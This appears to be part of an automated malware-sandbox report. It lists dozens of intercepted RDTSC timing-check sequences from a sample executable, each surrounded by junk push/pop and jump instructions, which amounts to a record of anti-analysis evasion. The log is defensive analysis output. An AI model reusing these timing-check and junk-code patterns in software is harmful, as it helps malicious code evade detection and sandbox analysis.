Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 163F0AC second address: 163F0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F19CD112F66h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15876DD second address: 15876FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CCBA87C8h 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15876FD second address: 1587702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1587702 second address: 1587719 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F19CCBA87BCh 0x00000008 push esi 0x00000009 jp 00007F19CCBA87B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1645366 second address: 164536C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 164956A second address: 164956E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1648B3C second address: 1648B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1648B40 second address: 1648B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16490D5 second address: 16490F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F72h 0x00000007 jmp 00007F19CD112F6Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1649296 second address: 164929F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 164929F second address: 16492B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnp 00007F19CD112F66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 165185D second address: 1651864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1651864 second address: 1651870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007F19CD112F66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1651870 second address: 1651874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1651874 second address: 1651885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007F19CD112F72h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1651885 second address: 165188B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 164F94D second address: 164F981 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a pop esi 0x0000000b pushad 0x0000000c jns 00007F19CD112F79h 0x00000012 jmp 00007F19CD112F73h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F19CD112F6Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1650241 second address: 1650245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16503DD second address: 16503E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16503E3 second address: 16503EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F19CCBA87B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1650543 second address: 1650549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 165069C second address: 16506D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BDh 0x00000007 jmp 00007F19CCBA87BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F19CCBA87C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16506D4 second address: 16506FF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F19CD112F66h 0x00000008 jnl 00007F19CD112F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jmp 00007F19CD112F6Bh 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edx 0x00000019 jno 00007F19CD112F68h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16506FF second address: 1650705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1650705 second address: 1650709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 164F4BD second address: 164F4CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1658F4B second address: 1658F68 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F19CD112F73h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1658F68 second address: 1658F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C4h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 165897E second address: 1658989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F19CD112F66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1658C71 second address: 1658CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F19CCBA87B6h 0x0000000c jmp 00007F19CCBA87BCh 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F19CCBA87BEh 0x00000018 jmp 00007F19CCBA87BFh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1665F7D second address: 1665F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1665F83 second address: 1665F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F19CCBA87C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1665CA8 second address: 1665CAD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1668BA2 second address: 1668BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1668BAC second address: 1668BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16685EE second address: 1668619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jns 00007F19CCBA87B6h 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F19CCBA87BEh 0x00000015 jmp 00007F19CCBA87BDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166C062 second address: 166C06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166D657 second address: 166D663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F19CCBA87B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166D663 second address: 166D667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166D667 second address: 166D66D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 166D66D second address: 166D68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F19CD112F77h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16746BD second address: 16746C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16746C3 second address: 16746E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F19CD112F78h 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16746E2 second address: 1674702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F19CCBA87B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F19CCBA87BCh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F19CCBA87B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 167AA5F second address: 167AA63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 167F483 second address: 167F4C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C9h 0x00000007 jmp 00007F19CCBA87BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F19CCBA87BEh 0x00000016 jnl 00007F19CCBA87B6h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 jnc 00007F19CCBA87B6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 167F4C7 second address: 167F4E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1681713 second address: 168172F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F19CCBA87C7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1682DEC second address: 1682E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnp 00007F19CD112F66h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 jo 00007F19CD112F74h 0x00000016 push esi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1688FDB second address: 1688FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F19CCBA87BBh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1688FEF second address: 1688FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 168915D second address: 1689177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689177 second address: 168917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 168917B second address: 168918B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16892FA second address: 1689305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689305 second address: 1689310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689310 second address: 1689317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 168945E second address: 1689462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689462 second address: 1689468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689468 second address: 1689474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689474 second address: 1689499 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F19CD112F68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F19CD112F77h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689499 second address: 168949E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 168949E second address: 16894AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F19CD112F66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689618 second address: 1689623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1689765 second address: 168976D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1690A9A second address: 1690AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1690AA0 second address: 1690AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F19CD112F66h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16905A0 second address: 16905AA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F19CCBA87B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16905AA second address: 16905D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F19CD112F6Ch 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F19CD112F72h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16905D8 second address: 16905DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 158770C second address: 1587719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jp 00007F19CD112F66h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 169076E second address: 1690772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1690772 second address: 169077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 169077C second address: 1690782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 1690782 second address: 16907B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F19CD112F6Eh 0x00000012 js 00007F19CD112F66h 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e jmp 00007F19CD112F76h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16DF3D7 second address: 16DF3EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F19CCBA87BEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e jl 00007F19CCBA87B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 16DF3EB second address: 16DF41E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F19CD112F66h 0x00000009 jmp 00007F19CD112F6Ch 0x0000000e ja 00007F19CD112F66h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ebx 0x00000018 jmp 00007F19CD112F72h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4C07 second address: 17A4C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F19CCBA87B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4C13 second address: 17A4C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F78h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnc 00007F19CD112F90h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007F19CD112F66h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4C44 second address: 17A4C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F19CCBA87B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4D96 second address: 17A4D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4D9C second address: 17A4DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4DA0 second address: 17A4DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A4F0D second address: 17A4F13 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A5640 second address: 17A5650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jl 00007F19CD112F66h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17A5650 second address: 17A565A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F19CCBA87BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17AA062 second address: 17AA083 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007F19CD112F66h 0x00000012 jmp 00007F19CD112F6Eh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17AA12E second address: 17AA133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17ABA00 second address: 17ABA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F19CD112F6Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 17ABA11 second address: 17ABA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F19CCBA87B8h 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F19CCBA87CAh 0x00000015 jmp 00007F19CCBA87C4h 0x0000001a rdtsc
